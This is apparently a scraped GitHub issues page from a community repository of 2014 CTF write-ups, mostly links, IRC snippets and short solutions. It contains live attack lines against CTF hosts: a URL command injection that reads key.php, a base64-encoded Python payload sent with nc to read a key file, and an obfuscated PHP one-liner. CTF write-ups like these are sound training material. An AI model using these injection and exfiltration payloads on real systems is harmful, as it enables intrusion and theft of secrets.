ctfs / write-ups-2014 Goto Github PK
View Code? Open in Web Editor NEWWiki-like CTF write-ups repository, maintained by the community. 2014
Wiki-like CTF write-ups repository, maintained by the community. 2014
curl 'http://phpcrypto.2014.ghostintheshellcode.com/crypto.php' --data 'function=dump' > source.html
20:04:11 <phiber_> godmode_, use function dump to get the source, then set debug arg and inject php code in plaintext var
Forked the solution of White Noise
11:06:59 <JohnDoe> you can find some write-ups there :
11:07:01 <JohnDoe> http://www.incertia.net/blog/
11:07:08 <JohnDoe> http://blogs.univ-poitiers.fr/e-laize/
11:07:13 <JohnDoe> http://tasteless.se/2014/05/
00:03:30 <steeve> for 300? authlog -> html5.js -> /analytics.js -> announcement.pdf -> announcement.pdf | pdfstreamdumper
Incomplete write-up: https://github.com/ctfs/write-ups/blob/master/csaw-ctf-2014/fluffy-no-more/README.md First steps to be added.
http://gynvael.vexillium.org/dump/xxxx.php.txt:
<?php $_=~¾¬¬º«; $_(~¯¶±«.'('.~ÎÌÌÈ.')'); ?>
The ami_id
parameter is vulnerable to command injection.
http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=;ls; or http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=%0als%0a
ec2-api-tools-1.6.12.0
ec2.php
index.html
index_files
key.php
http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=;cat%20key.php;
<?php
/* flag{0aea26e968895efa40b563e3e8fe8f19} */
echo('There\'s a key here.');
?>
Hey guys,
Here's a write-up on the binary 100 challenge from the HITB CTF in Amsterdam by team hDs.
http://cedricvb.be/post/reverse-engineering-the-hitb-binary-100-ctf-challenge/
Cheers /c
BBGP: https://privatepaste.com/6afd54f16c
BYHD: http://zepvn.com/blog/defcon-ctf-quals-2014-byhd.php
dosfun4u: https://github.com/nopple/ctf/tree/master/dosfun4u
heap: http://pastebin.com/iM6wCRqa
polyglot link is broken: http://sigint.ru/writeups/2014/05/18/defcon-2014-quals--polyglot/
also, another polyglot: https://gist.github.com/IdolfHatler/d952bf797a4d71cddbba
http://cseweb.ucsd.edu/~hovav/papers/hs09.html
paper: http://cseweb.ucsd.edu/~hovav/dist/reconstruction.pdf
source: http://cseweb.ucsd.edu/~hovav/dist/rsabits-1.0.tar.gz
Note that it's not a drop in solution, but it's supposedly pretty close.
This is live as of now: http://backdoor.cognizance.org.in
$ base64 <<< "self.request.send(open('key').read())"
c2VsZi5yZXF1ZXN0LnNlbmQob3Blbigna2V5JykucmVhZCgpKQo=
$ echo ':c2VsZi5yZXF1ZXN0LnNlbmQob3Blbigna2V5JykucmVhZCgpKQo=' | nc -v radioactive.2014.ghostintheshellcode.com 4324
found 0 associations
found 1 connections:
1: flags=82<CONNECTED,PREFERRED>
outif en0
src 192.168.107.131 port 59275
dst 107.20.236.180 port 4324
rank info not available
TCP aux info available
Connection to radioactive.2014.ghostintheshellcode.com port 4324 [tcp/*] succeeded!
Waiting for command:
Welcom3ToTheNewAgeItsARevolutionISuppose
My solution to pwn200. Slightly different approach (overwrite saved EIP instead of GOT): https://gist.github.com/Bartol0/283564a864e270b554ef
Revenge of Imgception consists of 8 stages. Each stage involves extracting one type of image from another.
Prior to the game, a large number of images will be pre-generated to save processing power and reduce the infrastructure requirements of the challenge. Players will be presented with a randomly chosen image from this set. The idea is to cause confusion among the players, as two players working the challenge together are unlikely to receive the same image, though the challenge proceeds identically for all images. This behavior continues for the duration of the challenge, as the images for each stage are randomly selected when the challenge is generated.
1-1: The file is a JPEG. The next stage is hidden in comment fields (\xFF\xFE). The number of comment fields is variable because they have a maximum size of 65535.
2-1: The file is an animated GIF. The next stage is hidden in a set of comment extensions as binary data. The number of comment extensions is variable depending on the size of the next stage.
3-1: The file is a zip full of PNG files. The next stage is spread among them. Each PNG has a custom chunk marked with a "icTf" header. Each chunk begins with 3 bytes of the order string ("ThankYouMarioButOurPrincessIsInAnotherCastle" * 20) followed by a null byte, followed by binary data. The binary data chunks from each file must be concatenated together in the order given by the order string. The entirety of the order string may not be used, as the zip contains a variable number of files.
4-1: The file is a floppy disk image containing the next stage. Nothing special about this one. The previous stage is complex enough to warrant a freebie.
5-1: The file is a Super Mario Brothers ROM image for the Nintendo Entertainment System. It is playable in the fceux emulator, and the hope is that players will attempt to play through the game to continue to the next stage. However, the next stage has actually been concatenated to the end of the ROM, and is marked with "GITS" * 512.
6-1: The file is an ISO image with a hidden directory. When mounted with default (linux) options, the only apparent file is a JPEG image. However, when mounted with the --no-joliet option, the next stage becomes apparent.
7-1: The file is a multi-page TIFF image with broken file magic. The file magic is \x49\x4d\x2a\x2a. The TIFF file header indicates whether the image is little or big endian by the first two bytes being either \x49\x49 (little) or \x4d\x4d (big). The next two bytes are similarly arranged, either \x2a\x00 (little) or \x00\x2a (big). The correct file header for this image is \x49\x49\x2a\x00. Once the header is fixed, the image contains three images - one world 7-1 image and two apparently identical world 8-1 images that constitute the next stage.
8-1: The files are two apparently identical greyscale BMP images. The images are not, however, identical. The final image is steganographically hidden in the delta between color byte values. By subtracting the byte values in one file from the corresponding byte in the other, some bytes will result in a value between -8 and +7. Each value represents a single nibble of the final image.
The final image contains a congratulatory message and the key: K00pas@llth3w@yd0wn
Use exiftool
to extract the comments from the images.
Not a write-up. To aim of this repo is to make it easy for anyone to simply clone and play against the benchmark: https://github.com/janosgyerik/stripe-ctf3
It's not done yet. I already added most of the test data to eliminate dependence on Stripe's AWS instances. I'm still working on precise instructions, especially with trickier build steps, for example Scala. I will clone on a virgin Ubuntu and see what works out of the box and what doesn't, and add the precise setup steps, probably mostly apt-get install name1 name2 ...
commands.
See you tomorrow in London!
Source (released after the CTF):
<html>
<head>
<title>Emdee</title>
<style type='text/css'>
body { font-family: Verdana, sans-serif; font-size: 15px; }
em { font-family: monospace; font-style: normal; font-weight: bold; padding: 4px 10px; background: #eee; border: 1px solid #aaa; }
strong { color: #800000; }
</style>
</head>
<body><center>
<h2>Welcome to Emdee</h2>
Welcome to the Emdee service. We use the famous <a href='http://www.ietf.org/rfc/rfc1321.txt'>MD5</a> algorithm to help keep your data secret.<p/>
MD5 is a one-way function, but it has a flaw: one can precompute a ton of MD5 hashes and make a rainbow table.<p/>
To mitigate this, we compute <em>MD5( SALT + your_secret )</em> (patent pending).<br/><br/>
<h3>See for yourself</h3>
We took a short dictionary word, fed it into our <b>genuine patent-pending algorithm</b> and got:<p/>
<em>40288d60073775070a7edcdcd1df9c56 -</em>.<p/>
Can you restore our secret word? We don't think so!<br/><br/>
<h3>Try for yourself</h3>
<strong>As for our FREE service, current timestamp will be added to your_secret</strong><br/>
Purchase the paid package to get rid of timestamp and to use our <b>genuine patent-pending algorithm</b>.<p/>
<big><form method='POST'>Secret: <input type='password' name='secret' /> <input type='submit' value='»' /></form></big>
<?php
$salt = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
if (isset($_POST['secret']) && $_POST['secret'] != "") {
echo "Result: ";
$timestamp = microtime(true);
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$proc = proc_open('socat - exec:md5sum,pty,ctty,echo=0', $descriptorspec, $pipes);
if (!$proc) {
echo "<strong>Error occured</strong>";
} else {
$data = "$salt" . $_POST['secret'] . $timestamp . "\x04\x04";
if (fwrite($pipes[0], $data) != strlen($data)) {
echo "<strong>Error occured</strong>";
}
$res = "";
while (!feof($pipes[1])) {
$res .= fgetc($pipes[1]);
}
echo "MD5( SALT + your_secret + $timestamp ) = <em>" . htmlspecialchars(trim($res)) . "</em>";
}
}
?>
</center></body>
</html>
Here's a writeup I wrote, with exploit: http://thejh.net/written-stuff/defcon-quals-2014-sftp-writeup
notes.txt
amirite)http://www.cravetocode.com/2014/03/defkthon-ctf-misc-200-writeup.html
would be happy if you link.
Unbearable:
To solve this one you needed to edit local player attribute use accessory. The only accessory to edit is wine. Adjust the random range numbers to be 100 and the wine will give you invincibility and allow you to bypass the bears.
Moon Boots:
Similar to unbearable you needed to change the players initial jump velocity to something above 25. Then when you jump you wind up in space. Moon Boots!
Cave of Nope:
Again with jump edited you can jump over the wall in the spiders cave. Kill the big spider and you get the flag.
Boaring Quest:
http://tasteless.se/2014/01/gits-2014-a-boaring-quest-pwn-adventure-150/
Hi, I've posted a writeup at my blog
http://blog.ztrix.me/blog/2014/05/10/asis-quals-2014-serial-number-writeup/
Could you include the link?
Thanks.
Recently a couple developers created Gitbook, an easy application which converts GitHub repositories into modern html websites. I recently set it up for the WIP CTF Resources, and I think it provides another way to read and make use of these great write ups.
@mathiasbynens has expressed that he likes the structure of the repository as folders, as it represents the culture of CTFs and is very intuitive and simple. The best part of creating a Gitbook for the repository is that the regular master branch would remain the same and function as it does now.
Since this repository is very large and will only continue to grow, I think it would be best to only have the most recent 3 or 4 CTFs presented in the book. That way the most visited write-ups can be found in an eye-pleasing layout, while if someone wants to see old write-ups they can look in the repository itself as they do now.
The only issue I see as of now is the build series for updating the book. So far I have had to rebuild the whole book and import the SUMARRY.md every time there is a change. This is a very tedious process, but once an easier method is found it would a very simple process to have the book updated from changes in the master branch repository.
Hi, here's my writeup on Reversing 300 task from Defkthon CTF.
http://rce4fun.blogspot.com/2014/03/defkthon-ctf-2014-reversing-300-writeup.html
Thanks.
Some write-ups are listed here, let's add them here as well!
Hi, Recently I've searching for some of the solutions for hitcon-ctf 2014 and this is the solution for G8LA I would like to add this solution here this is a great initiative in ctf write ups.
Solution.
http://lockboxx.blogspot.com.es/2014/08/hitcon-2014-ctf-writeup-g8la-forensics.html
PD: I don't know how do you manage the addittions so I'm reporting this as issue.
Best Regards.
09:52:13 <j0f> mathiasbynens, easy way would be using remote img upload and pointing to a netcat listen port
Anyone want to explain this in a bit more detail add this alternate, easier solution to the write-up?
I've added tasks from GPN CTF 2014. Some tasks, descriptions and additional files are missing but since nobody was adding those I though I would check in what I have.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.